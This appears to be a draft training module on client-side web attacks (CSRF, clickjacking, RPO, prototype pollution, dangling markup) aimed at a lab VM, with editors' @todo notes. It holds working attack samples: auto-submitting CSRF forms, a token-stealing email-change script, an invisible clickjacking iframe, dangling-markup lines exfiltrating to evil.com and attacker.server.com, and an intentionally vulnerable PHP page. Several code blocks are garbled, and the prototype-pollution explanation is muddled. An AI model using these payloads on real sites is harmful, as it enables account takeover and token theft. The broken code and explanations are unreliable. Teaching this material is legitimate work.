# Other client-side attacks

## Cross-Site Request Forgery
#### Cross-Site Request Forgery - Definition
CSRF - this type of attack is about sending a request on behalf of the attacked user. I mentioned CSRF earlier in the case of the XSS attack in POST. Both attacks in this regard are quite similar until the request is sent. In the case of XSS, a malicious load of JavaScript is sent to the website, and in the case of CSRF, malicious data is sent, e.g. a password change form.

#### CSRF - Attacks
CSRF attacks most often take the form of an attack on a URL address or a form. In any case, it is required that the victim interacts. In the case of a URL, it is enough for the victim to click on a malicious link, which may e.g. add a user. In the case of a form, it is necessary to persuade the victim to open a page with a fake form and a real page with a real form.
Cross-Site Request Forgery is not very popular, despite the fact that it can pose even a greater threat than the XSS. In practice, many websites are vulnerable to this type of attack.

#### XSRF (CSRF) - Example
This is sample code that can be sent in the user’s name in order to attack. Thanks to it, the attacker can swap the victim’s email account with their own and gain access to all account data.

```html
<html>
  <body>
	<form action/=/"https://vulnerable-website.com/email/change" method="POST">
  	<input type="hidden" name="email" value="evil@email.com" />
	</form>
	<script>
  	document.forms[0].submit();
	</script>
  </body>
</html> 
```

#### XSS + CSRF
One technique of defending against CSRF attacks, sometimes called XSRF, is to generate a new token with each form. In this way, in order for the attacker to be able to send the form, they also need to send the token, which is random. However, there are cases where XSS and CSRF vulnerabilities occur together. Thanks to this, the attacker can download the CSRF token using an XSS attack and perform an effective XSRF attack.

```html
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get'//,'/my-account',true);
req.send();
function handleResponse() {
	var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
	var changeReq = new XMLHttpRequest();
	changeReq.open('post', '/my-account/change-email', true);
	changeReq.send('csrf='+token+'&email=test@test.com')
};
</script> 
```
In this case, the XSS vulnerability occurs at the endpoint /my-account. Thanks to this vulnerability, the attacker can read a random CSRF token, attach it to a crafted form and send it on behalf of the victim.

#### CSRF - exercise
Go to [/csrf.php](http://vuln.vms.perkmylife.com/csrf.php) and try to write a simple form in a second tab that will change the username.

```html
# /var/html/www/csrf.php | /src/vuln/csrf.php
<html>
<head>
    <title>CSRF</title>
</head>
<body>
    <form action="csrf.php" method="POST">
        Check CSRF!
        <input name="vulncsrf" type="text" size="50">
        <input type="submit">
    </form>
    <h1>
    <?php
        $query = $_POST['vulncsrf'];
        echo $query;
    ?>
    </h1>
</body>
</html>
```
It's a simple form that downloads text and sends it to a variable in a PHP language. Next, the variable is listed on the page. The problem with this form is that it does not have a CSRF token. The attacker can create an identical form with a hidden value inside and then send it automatically. Thus, they will display a desired text, e.g. XSS.

Below you will find an example of an attack form
```htm
l<html>
    <head>
    </head>
    <body>
        <form action="http://vuln.vms.perkmylife.com/csrf.php" method="POST">
            <input name="vulncsrf" type="hidden" value="newEmailAddress">
            <input type="submit">
        </form>
        
        <script>
        document.forms[0].submit();
        </script>
    </body>
</html>
```

 The difference is clear. First, the action parameter refers to the page, not just the file. After all, in this case, it’s necessary to have a website address. The additional text input is hidden so as not to reveal your intentions. 
 Next comes the JavaScript code that allows you to approve and submit the form without the user’s consent.

 > @todo Rafał/Jakub, I'm not getting this exercise. Please elaborate on it, and write exact steps on how to carry it out so that it's eye boggling that you can actually change someone's username or the best email address. Also, add the payload to a separate folder in /src/vuln/payloads (say it will be csrf-payload.html). Improve this payload so that it actually changes something under /csrf.php and also so that the click on csrf-payload.html url doens't load the form, but submits the form via XMLRequest and loads some other website. You'll have fireworks ;)


## Clickjacking

#### Clickjacking - Definition
A Clickjacking attack is very similar to CSRF, but requires more interaction from the user. Not only is it necessary to have an open tab with a fake and genuine page, the user has to click on a special button, hence the name of the vulnerability. Clickjacking tricks the user that by clicking on a site object they are performing the action on the same site. In fact, the object that they click does not belong to the site.
```html
<head>
	<style>
		#target_website {
			position:relative;
			width:128px;
			height:128px;
			opacity:0.00001;
			z-index:2;
		}
		#decoy_website {
			position:absolute;
			width:300px;
			height:400px;
			z-index:1;
		}
	</style>
</head>
...
<body>
	<div id="decoy_website">
		...decoy web content here...
	</div>
	<iframe id="target_website" src="https://vuln.website.com">
	</iframe>
</body>
```
> @todo please make an exercise page/endpoint for this under /src and on the vuln VM and also make in more real. For instance you can change the same page like in CSRF exercise, but this time, by clicking some button, or going mouseover some DOM element

#### Clickjacking - Exercise
Go to the OWASP-2017 tab, then A3, next Information-Disclosure and Clickjacking.
http://vuln.vms.perkmylife.com:8080/mutillidae/index.php?page=framing.php
Play for a while to get acquainted with the attack
> @todo Please write some short instruction on how to play with it. Inspect, what to look at, what js/DOM elements to focus on for this Clickjacking to actually be a tricky hack. Try to change CSS so that the actual clickbox is transparent. Also explain, that you can XSS such a clickjacking element. Is it possible a vulnerability if you can achieve the same effect by running ads on someones website?
> @todo fix Exercise 1 in the slides

## RPO (Relative Path Overwrite)/attacks using CSS
Relative Path Override CSS relies on loading malicious data using paths that are often provided by programmers relative to CSS files. Files loaded as style sheets do not load the code by default, i.e. the backend code cannot be executed on it. This seemingly insignificant functionality gives excellent results and opens up new attack paths. 

In an example attack, instead of the style sheet, you can include an aspx file, the source code of which should be invisible. Since it is loaded as a style sheet, the code is not interpreted and displayed as normal text. This behavior can help reveal very sensitive information and sometimes even enable RCE.

```html ↓Doc base:/demo/RPO/anotherpage.css.aspx/%2f..%2f..%2f..%2fdemo/RPO/CSS path:/demo/RPO/anotherpage.css.aspx/%2f..%2f..%2f..%2fdemo/RPO/../../style.css/demo/RPO/anotherpage.css.aspx/style.cs ```
> @todo what's that?? Elaborate on it, make a simple exercise. Create a sample .aspx or .php file under src and on the machine and show that you can actually view the files content in Browser's sources tab. Also explain via what tags you can carry out this attack. Note, that in the slides there's a bit different code.

## JSON Hijacking
The best example of this type of error is the notorious prototype pollution with sent data in JSON format (the vulnerability itself is not related to json hijacking, but often occurs with JSON formats and serves as a great example of this type of attack).
The user can jump to various objects using Javascript functionality in such a way that they can modify the data, e.g. in JSON format, and send a malicious package. Sometimes such an error even leads to Remote Code Execution, i.e. remote command execution on the server.

A malicious user may take advantage of the so-called `__proto__`, that is, referencing the parent class.
For the sake of the example, suppose you have an application with three classes: the All class - parent, the Users class, and the Admin class, which are parallel. The user sends the information to the Users class and has no access to the Admin class, but is it true?
Let’s assume a form field in the Users class - “user” and a form field in the Admin class - “admin”
The user sends the following information in a JSON format:
```json
{"user":"guest"}
```

The attacker may try to jump to a higher class using __proto__ and try to influence other classes in the All class. They may even try to jump out of the All class.
```json
{"user.__proto__.Admin.admin": "true"}
```

The code says: “Jump out of the User class, use the Admin class, and more specifically the admin parameter and set it to value true”.
After a successful attack, we assigned the “guest” user with admin rights.
> @todo maybe some url to a proof of concept working example?

## Dangling-markup
Dangling markup injection is a rare attack that is most often used as an attack supporting attacks such as XSS and CSRF.
If the application successfully defends itself against XSS, e.g. in the form of a good CSP policy, it may be possible to perform the injection in a slightly different way. 

To explain the attack I will try to use an example.
```html
<form action='http://evil.com/log.cgi'>
 <textarea> ← Injected line …
 <input type="hidden" name="xsrf_token" value="12345">
  ... 
</form>
```

In the injected line, you can try to inject the following syntax:

```html
<img src="https://attacker.server.com?
```

The browser will successfully read the img tag and the src attribute, which has a certain problem because there is no end quotation mark. Therefore, the browser will read the code of the page until it hits the quotation marks or the page is not finished. Then it will send all the code to the attacker’s server. Of course, there is the csrf token in this code, which is essential for the attack.

More information about this and other Client-side attacks can be found on the great website of Burp’s creators - PortSwigger
https://portswigger.net/web-security/cross-site-scripting/dangling-markup
